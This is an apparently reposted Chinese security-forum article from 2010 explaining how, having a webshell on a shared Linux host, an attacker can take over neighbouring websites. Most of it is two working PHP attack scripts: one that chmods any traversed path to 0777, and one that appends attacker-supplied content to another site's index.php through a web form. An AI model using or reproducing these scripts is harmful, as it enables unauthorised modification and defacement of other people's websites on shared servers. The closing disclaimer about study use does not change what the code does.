欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

linux下用webshell对文件权限的修改

来源:转载 作者:佚名 时间:2010-05-16 TAG: 我要投稿
yesu(http://hi.baidu.com/3hack_yesu/) 

当我们拥有了一个linux下的shell(服务器上多个网站)。 

这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。 

那么,这样的主机设置肯定是不安全的。 

有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。 

我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。 

代码: 

<?php 
$path = stripslashes($_GET[’path’]); 
$ok = chmod ($path , 0777); 
if ($ok == true) 
echo " CHMOD OK , Permission editable file or directory. Permission to write"; 
?> 

保存为chmod.PHP 

使用方法简单,访问 

http://site/chmod.php?path=../../其他站点的目录/index.php 

这里的index.PHP是要修改权限的文件。 


另外一个exploit: 

把下面的代码保存为exploit.PHP 

代码: 

<?php 

         @$filename = stripslashes($_POST[’filename’]); 
         @$mess = stripslashes($_POST[’mess’]);    
     $fp = @fopen("{$_POST[’filename’]}", ’a’); 
         @fputs($fp,"$mess <hr size=\"1\" color=\"black\">"); 
         @fclose($fp); 
?>  

<form name="form1" action="exploit.php" method="post"> 
<p align="center"><b> 
<br> 
CODE :<br> 
<textarea name="mess" rows="3"></textarea></font></b></textarea> 
</font></b> <p><input type="hidden" name="filename" value="../../AUTRE WEBSITE SUR LE MULTIHOSTING/index.php"></p> 
<center> 
<input type="reset" name="Submit" value="Delete"> 
<input name="go" type="submit" value="Send" > 
<center> 
</form> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> 
<title>Changing CHMOD Permissions Exploit - Contact : the_gl4di4t0r[AT]hotmail[DOT]com</title> 
</head> 
<body> 
</center> 
</body> 
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载